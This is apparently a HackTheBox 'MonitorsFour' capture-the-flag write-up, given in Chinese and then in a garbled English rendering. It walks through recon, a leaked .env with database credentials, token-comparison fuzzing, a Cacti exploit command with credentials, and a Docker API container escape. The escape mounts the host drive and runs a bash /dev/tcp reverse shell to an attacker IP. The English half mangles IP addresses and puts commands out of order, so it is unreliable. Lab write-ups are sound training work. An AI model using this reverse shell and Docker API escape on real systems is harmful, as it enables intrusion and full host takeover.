htb monitorsfour

Recon

# Nmap 7.95 scan initiated Sun Dec  7 20:24:32 2025 as: /usr/lib/nmap/nmap --privileged -Pn -p80,5985 -sC -sV -oA ./Recon/10.10.11.98 10.10.11.98
Nmap scan report for monitorsFour.htb (10.10.11.98)
Host is up (0.076s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: MonitorsFour - Networking Solutions
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec  7 20:24:45 2025 -- 1 IP address (1 host up) scanned in 13.18 seconds
# Dirsearch started Sun Dec  7 20:31:17 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://monitorsfour.htb

200    97B   http://monitorsfour.htb/.env
403   548B   http://monitorsfour.htb/.ht_wsr.txt
403   548B   http://monitorsfour.htb/.htaccess.orig
403   548B   http://monitorsfour.htb/.htaccess.bak1
403   548B   http://monitorsfour.htb/.htaccess.save
403   548B   http://monitorsfour.htb/.html
403   548B   http://monitorsfour.htb/.htm
403   548B   http://monitorsfour.htb/.htaccess_sc
403   548B   http://monitorsfour.htb/.htaccessBAK
403   548B   http://monitorsfour.htb/.htaccessOLD
403   548B   http://monitorsfour.htb/.htaccess.sample
403   548B   http://monitorsfour.htb/.htaccess_extra
403   548B   http://monitorsfour.htb/.htaccess_orig
403   548B   http://monitorsfour.htb/.htaccessOLD2
403   548B   http://monitorsfour.htb/.htpasswd_test
403   548B   http://monitorsfour.htb/.httr-oauth
403   548B   http://monitorsfour.htb/.htpasswds
200   367B   http://monitorsfour.htb/contact
403   548B   http://monitorsfour.htb/controllers/
200     4KB  http://monitorsfour.htb/login
301   162B   http://monitorsfour.htb/static    -> REDIRECTS TO: http://monitorsfour.htb/static/
200    35B   http://monitorsfour.htb/user
301   162B   http://monitorsfour.htb/views    -> REDIRECTS TO: http://monitorsfour.htb/views/

查看.env

DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt \
     -u http://monitorsfour.htb/ -H 'host: FUZZ.monitorsfour.htb' -fw 3
--> cacti

Web

查看后得到一个漏洞,但是要CVE-2025-24367

image 104.png

  • 检查token参数是否存在
  • 检查token参数是否有效

尝试一下token宽松测试,后端使用==进行token比较,可以参考此内容

0
1
true
false
null
""
''
[]
0e1234
0e999999
0000
00
0.0

可以使用这个字典尝试fuzz测试。其中0e代表科学计数法

随后可以得到凭据admin:wonderful1进入monitorsfour.htb/login.php得到(Marcus Higgins)

尝试虚拟主机凭据marcus:wonderful1

搜索得到

python3 exploit.py -u marcus -p wonderful1 -i 10.10.16.68 -l 4444 --url http://cacti.monitorsfour.htb

即可得到www-data

Foothold

ip a发现是在容器内

尝试ssh和su都不能登陆上去marcus,但可以查看user.txt

$ cat /etc/resolv.conf 
# Generated by Docker Engine.
# This file can be edited; Docker Engine will not make further changes once it
# has been modified.

nameserver 127.0.0.11
options ndots:0

# Based on host file: '/etc/resolv.conf' (internal resolver)
# ExtServers: [host(192.168.65.7)]
# Overrides: []
# Option ndots from: internal

得到外部服务器是192.168.65.7

PrivEsc

我们可以进行内部扫描

$ ./fscan-XRwlvVTi -h 192.168.65.7 -p 1-65535

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
192.168.65.7:53 open
192.168.65.7:2375 open
192.168.65.7:3128 open
192.168.65.7:5555 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://192.168.65.7:2375  code:404 len:29     title:None
[*] WebTitle http://192.168.65.7:5555  code:200 len:0      title:None
[+] PocScan http://192.168.65.7:2375 poc-yaml-docker-api-unauthorized-rce 
[+] PocScan http://192.168.65.7:2375 poc-yaml-go-pprof-leak 
已完成 4/4
[*] 扫描结束,耗时: 34.668920056s

根据此CVE-2025-9074

curl -s [http://192.168.65.7:2375/images/json](http://192.168.65.7:2375/images/json)查看有哪些容器可用,发现:docker_setup-nginx-php:latest

{
  "Image": "docker_setup-nginx-php:latest",
  "Cmd": ["/bin/bash","-c","bash -i >& /dev/tcp/10.10.16.68/4444 0>&1"],
  "HostConfig": {
    "Binds": ["/mnt/host/c:/host_root"]
  }
}

将上述创建为create_container.json

curl -H 'Content-Type: application/json' -d @create_container.json [http://192.168.65.7:2375/containers/create](http://192.168.65.7:2375/containers/create) -o response.json创建容器

监听4444

cid=$(grep -o '"Id":"[^"]*"' response.json | cut -d'"' -f4)提取id

curl -X POST [http://192.168.65.7:2375/containers/$cid/start](http://192.168.65.7:2375/containers/$cid/start)

htb monitorsfour

Reconnaissance

# Nmap 7.95 scan started on Sunday, December 7, 2025, at 20:24:32:
# Command used: /usr/lib/nmap/nmap --privileged -Pn -p80,5985 -sC -sV -oA ./Recon/10.10.11.98 10.10.11.98
Nmap scan report for monitorsFour.htb (10.10.11.98):
The host is online (latency: 0.076 seconds).

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: MonitorsFour - Networking Solutions
5985/tcp open  http    Microsoft HTTPAPI (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service details: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection has been completed. Please report any incorrect results at: https://nmap.org/submit/ .
# Nmap completed on Sunday, December 7, 2025: 1 IP address (1 host) scanned in 13.18 seconds.

Dirsearch started on Sunday, December 7, 2025, at 20:31:17, with the following command:

/usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://monitorsfour.htb

File sizes:

Access errors (403):
All files returned a 403 Forbidden response.

Contents of .env file:

DB_HOST=mariadb  
DB_PORT=3306  
DB_NAME=monitorsfour_db  
DB_USER=monitorsdbuser  
DB_PASS=f37p2j8f4t0r

Additional command execution:

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt \
     -u http://monitorsfour.htb/ -H 'host: FUZZ.monitorsfour.htb' -fw 3  
--> Output: cacti

Web

After investigation, a vulnerability was identified, with the CVE ID CVE-2025-24367.

image 104.png

  • Check whether the token parameter exists.
  • Verify the validity of the token parameter.

Try a loose token test; the backend compares tokens using the == operator. For more information, refer to this documentation:

0
1
true
false
null
''
''
[]
0e1234
0e999999
0000
00
0.0

You can use this dictionary to perform fuzz testing. The 0e prefix represents scientific notation.

This vulnerability allows you to obtain the credentials admin:wonderful1 and use them to log in to monitorsfour.htb/login.php (exploited by Marcus Higgins).

Try the virtual host credentials marcus:wonderful1.

The PoC (Proof of Concept) for this vulnerability can be found at: https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC/tree/main.

To exploit this vulnerability, use the following command:

python3 exploit.py -u marcus -p wonderful1 -i 10.10.16.68 -l 4444 --url http://cacti.monitorsfour.htb

This will grant access to the www-data resource.

Footprint Analysis

The IP address 127.0.0.11 was identified; it appears to be within a container.

Attempting to log in using ssh or su is not possible for the user marcus, but you can view the contents of the user.txt file:

$ cat /etc/resolv.conf
# Generated by Docker Engine.
# This file can be edited; Docker Engine will not make further changes once it has been modified.
nameserver 127.0.0.11
options ndots:0

# Based on the host file `/etc/resolv.conf` (internal resolver)
# ExtServers: [host(192.168.65.7)]
# Overrides: []
# Option ndots from: internal

The external server is identified as 192.168.65.7.

PrivEsc

We can perform an internal scan using the following command:

$ ./fscan-XRwlvVTi -h 192.168.65.7 -p 1-65535

Scan Results:

___                              _    
/ _ \     ___  ___ _ __ __ _  ___| | __ 
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
Start infoscan:
192.168.65.7:53 is open
192.168.65.7:2375 is open
192.168.65.7:3128 is open
192.168.65.7:5555 is open
[*] Number of open ports: 4
Start vulscan:
[*] WebTitle: http://192.168.65.7:2375  (Code: 404, Length: 29); Title: None
[*] WebTitle: http://192.168.65.7:5555  (Code: 200, Length: 0); Title: None
[+] PocScan findings:
    http://168.65.7:2375 (Poc-Yaml-Docker-API-Unauthorized-RCE)
    http://168.65.7:2375 (Poc-Yaml-Go-PProf-Leak)
Scan completed in 34.668920056 seconds.

According to CVE-2025-9074:

Use the following command to check available containers:

curl -s [http://192.168.65.7:2375/images/json]

The result shows a container with the name docker_setup-nginx-php:latest:

{
  "Image": "docker_setup-nginx-php:latest",
  "Cmd": ["/bin/bash","-c","bash -i >& /dev/tcp/10.10.16.68/4444 0>&1"],
  "HostConfig": {
    "Binds": ["/mnt/host/c:/host_root"]
}

Create a JSON file called create_container.json with the above information:

curl -H 'Content-Type: application/json' -d @create_container.json [http://168.65.7:2375/containers/create] > response.json

Create the container using the create_container.json file:

curl -H 'Content-Type: application/json' -d @response.json [http://168.65.7:2375/containers/create] > response.json

Listen for connections on port 4444:

curl -X POST [http://168.65.7:2375/containers/$cid/start]

Extract the container ID:

cid=$(grep -o '"Id":"[^"]*"' response.json | cut -d'"' -f4)

Finally, use the extracted ID to start the container:

curl -X POST [http://168.65.7:2375/containers/$cid/start]